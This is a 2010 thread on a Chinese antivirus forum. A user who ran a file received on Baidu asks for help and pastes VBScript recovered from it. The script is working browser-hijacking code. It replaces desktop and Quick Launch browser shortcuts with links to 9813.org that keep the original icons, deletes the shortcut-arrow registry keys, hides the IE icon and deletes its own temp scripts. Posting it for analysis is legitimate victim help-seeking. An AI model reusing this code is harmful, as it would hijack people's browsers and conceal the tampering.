9813.org把我IE劫持了，并生产了一个假IE - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 反病毒/反流氓软件论坛 9813.org把我IE劫持了，并生产了一个假IE

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

9813.org把我IE劫持了，并生产了一个假IE

本主题由大版主 networkedition 于 2010-3-30 9:45:41 执行移动主题操作

刻画天堂初生襁褓狮帖子:1 注册: 2010-03-29 来自:	发表于： 2010-03-29 23:23 \| 只看楼主短消息资料字号：小中大 1楼 9813.org把我IE劫持了，并生产了一个假IE 在百度问问题，别人给我发了这个文件说是解答。压缩包打开是exe文件，我打开后就劫持了我的IE，后来重命名txt文件，打开后在乱码中发现一些信息，现在只知道打开它会打开我电脑上的记事本和调用C盘Temp/pag4.vbs 其他信息不明，avast也没报，但不知道这个文件到底什么问题…………传上来你们看看。如何能解决啊？附上我在记事本里看到的代码： “notepad.exe c:\WINDOWS\Temp\pag4.vbs c:\WINDOWS\Temp\pag5.vbs c:\WINDOWS\Temp\ialxoktb.vbs c:\WINDOWS\Temp\ialxokta.vbs C:\WINDOWS\Temp C:\WINDOWS C:\Program Files\Internet Explorer open vbs %s\ialxokta.vbs %s\ialxoktb.vbs %s\pag5.vbs %s\pag4.vbs ” “strFolderPath="C:\Documents and Settings\All Users\桌面" Set OperationRegistry=WScript.CreateObject("WScript.Shell") Dim m m=OperationRegistry.RegRead("HKEY_CLASSES_ROOT\http\shell\open\command\") n = Split(m, """") h = n(1) x="""" y="""" a= x+h+y strToReplace= a strReplace= a Set wshShell = CreateObject("Shell.Application") Set wshFSO = CreateObject("Scripting.FileSystemObject") AlterSubFolders wshFSO.GetFolder(strFolderPath) Sub AlterSubFolders(Folder) Set npFolder = wshShell.Namespace (Folder.Path) Set allFiles=Folder.Files For Each lnkFile In allFiles If InStrRev(UCase(lnkFile.Name), ".LNK") <> 0 Then Set lnkItem = npFolder.ParseName(lnkFile.Name) Set lnkItemLink = lnkItem.GetLink b = """"&lnkItemLink.Path&"""" If InStr(1, LCase(b), LCase("iexplore.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Safari.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Maxthon.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("SogouExplorer.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TheWorld.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TTraveler.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("360SE.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("chrome.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("GreenBrowser.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("opera.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("firefox"), 1) Then eee = strFolderPath+"\"+lnkFile.Name rr = "c:\"+lnkFile.Name c = lnkItemLink.Path set WhShell = WScript.CreateObject("WScript.Shell") set oShellLink = WhShell.CreateShortcut(rr) oShellLink.TargetPath = "http://www.9813.org/?tn=801" oShellLink.IconLocation = c oShellLink.Save Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile eee objFSO.MoveFile rr, "C:\Documents and Settings\All Users\桌面\" else End If End If Next End Sub On Error Resume Next Set Opistry=WScript.CreateObject("WScript.Shell") Dim strFolderPath strFolderPath=Opistry.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop") Set OperationRegistry=WScript.CreateObject("WScript.Shell") m=OperationRegistry.RegRead("HKEY_CLASSES_ROOT\http\shell\open\command\") n = Split(m, """") h = n(1) x="""" y="""" a= x+h+y strToReplace= a strReplace= a Set wshShell = CreateObject("Shell.Application") Set wshFSO = CreateObject("Scripting.FileSystemObject") AlterSubFolders wshFSO.GetFolder(strFolderPath) Sub AlterSubFolders(Folder) Set npFolder = wshShell.Namespace (Folder.Path) Set allFiles=Folder.Files For Each lnkFile In allFiles If InStrRev(UCase(lnkFile.Name), ".LNK") <> 0 Then Set lnkItem = npFolder.ParseName(lnkFile.Name) Set lnkItemLink = lnkItem.GetLink b = """"&lnkItemLink.Path&"""" If InStr(1, LCase(b), LCase("iexplore.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Safari.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Maxthon.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("SogouExplorer.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TheWorld.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TTraveler.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("360SE.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("chrome.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("GreenBrowser.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("opera.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("firefox"), 1) Then eee = strFolderPath+"\"+lnkFile.Name rr = "c:\"+lnkFile.Name c = lnkItemLink.Path set WhShell = WScript.CreateObject("WScript.Shell") set oShellLink = WhShell.CreateShortcut(rr) oShellLink.TargetPath = "http://www.9813.org/?tn=801" oShellLink.IconLocation = c oShellLink.Save Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile eee objFSO.MoveFile rr, "C:\Documents and Settings\All Users\桌面\" else End If End If Next End Sub On Error Resume Next Dim HiddenArrowIcon Set HiddenArrowIcon=WScript.CreateObject("WScript.Shell") Dim RegPath1,RegPath2 RegPath1="HKCR\lnkfile\IsShortCut" RegPath2="HKCR\piffile\IsShortCut" HiddenArrowIcon.RegDelete(RegPath1) HiddenArrowIcon.RegDelete(RegPath2) HiddenArrowIcon.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoInternetIcon",1,"REG_DWORD" On Error Resume Next wscript.sleep 3000 dim fso Set fso = CreateObject("Scripting.FileSystemObject") fso.DeleteFile "c:\\WINDOWS\\Temp\\ialxokta.vbs" ,true fso.DeleteFile "c:\\WINDOWS\\Temp\\ialxoktb.vbs" ,true fso.DeleteFile "c:\\WINDOWS\\Temp\\ialxoktc.vbs" ,true fso.DeleteFile "c:\\WINDOWS\\Temp\\pag5.vbs" ,true fso.DeleteFile "c:\\WINDOWS\\Temp\\pag4.vbs" ,true Set FSO=NoThing WScript.quit On Error Resume Next Set eShell = WScript.CreateObject("WScript.Shell") strFolderPath=eShell.SpecialFolders.Item("AppData")& "\Microsoft\Internet Explorer\Quick Launch\" 'Wscript.Echo strFolderPath Set OperationRegistry=WScript.CreateObject("WScript.Shell") Dim m m=OperationRegistry.RegRead("HKEY_CLASSES_ROOT\http\shell\open\command\") n = Split(m, """") h = n(1) x="""" y="""" a= x+h+y strToReplace= a strReplace= a Set wshShell = CreateObject("Shell.Application") Set wshFSO = CreateObject("Scripting.FileSystemObject") AlterSubFolders wshFSO.GetFolder(strFolderPath) Sub AlterSubFolders(Folder) Set npFolder = wshShell.Namespace (Folder.Path) Set allFiles=Folder.Files For Each lnkFile In allFiles If InStrRev(UCase(lnkFile.Name), ".LNK") <> 0 Then Set lnkItem = npFolder.ParseName(lnkFile.Name) Set lnkItemLink = lnkItem.GetLink b = """"&lnkItemLink.Path&"""" If InStr(1, LCase(b), LCase("iexplore.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Safari.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("Maxthon.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("SogouExplorer.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TheWorld.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("TTraveler.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("360SE.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("chrome.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("GreenBrowser.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("opera.exe"), 1) > 0 Or InStr(1, LCase(b), LCase("firefox"), 1) Then eee = strFolderPath+"\"+lnkFile.Name rr = "c:\Program Files\"+lnkFile.Name c = lnkItemLink.Path set WhShell = WScript.CreateObject("WScript.Shell") set oShellLink = WhShell.CreateShortcut(rr) oShellLink.TargetPath = "http://www.9813.org/?tn=801" oShellLink.IconLocation = c oShellLink.Save Set objFSO = CreateObject("Scripting.FileSystemObject") objFSO.DeleteFile eee objFSO.MoveFile rr, strFolderPath else End If End If Next End Sub” 用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0) 刻画天堂最后编辑于 2010-03-29 23:24:11
刻画天堂初生襁褓狮帖子:1 注册: 2010-03-29 来自:	分享到：

过客2007 版主帖子:16652 注册: 2006-10-18 来自:¤懒神↗之家￡	发表于： 2010-03-29 23:31 \| 短消息资料字号：小中大 2楼回复：9813.org把我IE劫持了，并生产了一个假IE 楼主参考：http://bbs.ikaka.com/showtopic-8691382.aspx 如果不能解决，可以加那个程序里面的群程序请解压之后再运行。运行的时候关闭瑞星监控传说在很远的古代，一个庙里，有一个大神与一个小鬼住在里面。天下了大雨，庙前的河里长了水。来了一个人，过不了河，就把庙里的大神搬了出去，丢在河里，然后他踏在大神的身上，飞跳了过河。等会又来了
过客2007 版主帖子:16652 注册: 2006-10-18 来自:¤懒神↗之家￡

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT